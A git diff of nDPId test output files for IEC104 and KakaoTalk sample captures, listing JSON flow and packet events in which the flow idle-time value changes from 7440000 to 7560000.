-00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317629088731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088731,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9JAAIAGAAAKd2kaCq\/TAdXwCWQAWRNVSKC7fVAQAP5RXAAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317629088739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088739,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9tAAIAGAAAKd2kaCq\/TA9XxCWTfP\/9mWYD8JFAQAP5RXgAA"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088495,"flow_last_seen":1317629088495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088495,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1317629088495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088495,"pkt":"eCvLK7lWABIAxkrACABFAAAoUqRAAH0GWeoKr9MBCndpGglk1fBIoLt3AFkTVVAQ\/elpjgAAAAAAAAAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088520,"flow_last_seen":1317629088520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088520,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317629088520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088520,"pkt":"eCvLK7lWABIAxkrACABFAAAoSx9AAH0GYW0Kr9MDCndpGglk1fFZgPwe3z\/\/ZlAQ+y9PxQAAAAAAAAAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317629088532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088532,"pkt":"eCvLK7lWABIAxkrACABFAAAuUsZAAH0GWcIKr9MBCndpGglk1fBIoLt3AFkTVVAY\/em9wgAAaAQBAEK5"} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317629088536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088536,"pkt":"eCvLK7lWABIAxkrACABFAAAuSyRAAH0GYWIKr9MDCndpGglk1fFZgPwe3z\/\/ZlAY+y+j+QAAaAQBAEK5"} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317629088731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088731,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9JAAIAGAAAKd2kaCq\/TAdXwCWQAWRNVSKC7fVAQAP5RXAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317629088739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088739,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9tAAIAGAAAKd2kaCq\/TA9XxCWTfP\/9mWYD8JFAQAP5RXgAA"} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-data-len":609,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1317629090498} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 diff --git a/test/results/KakaoTalk_chat.pcap.out b/test/results/KakaoTalk_chat.pcap.out index 445bd2589..c41b547d5 100644 --- a/test/results/KakaoTalk_chat.pcap.out +++ b/test/results/KakaoTalk_chat.pcap.out @@ -60,21 +60,21 @@ 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.86"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1430069022295,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":126,"pkt_l4_len":90,"thread_ts_msec":1430069022295,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAG4b2QAANREBFgq8AQEKGFK8ADViHQBaJnpwlYGAAAEAAgAAAAAFdXAtZ3AEdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAABasAEAV1cC1ncAR0YWxrAmdswBfAMgABAAEAAACsAARuTI0a"} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.26"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022297,"flow_last_seen":1430069022297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069022297,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069022297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022297,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzzVkAAPwZJoAoYUrxn9jn7x00fkMsN9JkAAAAAoAI5CGIPAAACBAV4BAIICgALB88AAAAAAQMDBw=="} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069022411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022411,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQZO92f2OfsKGFK8H5DHTSs\/AzbLDfSaoBIWoGVTAAACBAV4BAIICpj2V6UACwfPAQMDCQ=="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1430069022419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069022419,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTzV0AAPwZJpwoYUrxn9jn7x00fkMsN9JorPwM3gBAAc6oGAAABAQgKAAsH25j2V6U="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026012,"flow_last_seen":1430069026012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069026012,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069026012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026012,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq7kAArAYRrNg63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1430069026058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026058,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgAAEAAPwYptwoYUrzYOt0KjFIAUEM35dFioucAUBA+dl\/2AAA="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1430069026148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026148,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq70AArQYQq9g63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026370,"flow_last_seen":1430069026370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069026370,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069026370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069026370,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmtkAAPwbpMgoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCGaAAACBAV4BAIICgALCWYAAAAAAQMDBw=="} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1430069027366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069027366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmt0AAPwbpMQoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCE2AAACBAV4BAIICgALCcoAAAAAAQMDBw=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1430069027408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069027408,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACyOBEAA+AaI9K38YQIKGFK8AbuKr2Aiq0X8Gu\/RYBIRHJekAAACBAV4"} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069028075,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069028075,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgUEEAA+AZ+3XgcGvIKGFK8AFCGx0Ds0yKXy0vyUBQAAEEKAAA="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022297,"flow_last_seen":1430069022297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069022297,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069022297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022297,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzzVkAAPwZJoAoYUrxn9jn7x00fkMsN9JkAAAAAoAI5CGIPAAACBAV4BAIICgALB88AAAAAAQMDBw=="} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069022411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022411,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQZO92f2OfsKGFK8H5DHTSs\/AzbLDfSaoBIWoGVTAAACBAV4BAIICpj2V6UACwfPAQMDCQ=="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1430069022419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069022419,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTzV0AAPwZJpwoYUrxn9jn7x00fkMsN9JorPwM3gBAAc6oGAAABAQgKAAsH25j2V6U="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026012,"flow_last_seen":1430069026012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069026012,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069026012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026012,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq7kAArAYRrNg63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1430069026058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026058,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgAAEAAPwYptwoYUrzYOt0KjFIAUEM35dFioucAUBA+dl\/2AAA="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1430069026148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026148,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq70AArQYQq9g63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026370,"flow_last_seen":1430069026370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069026370,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069026370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069026370,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmtkAAPwbpMgoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCGaAAACBAV4BAIICgALCWYAAAAAAQMDBw=="} 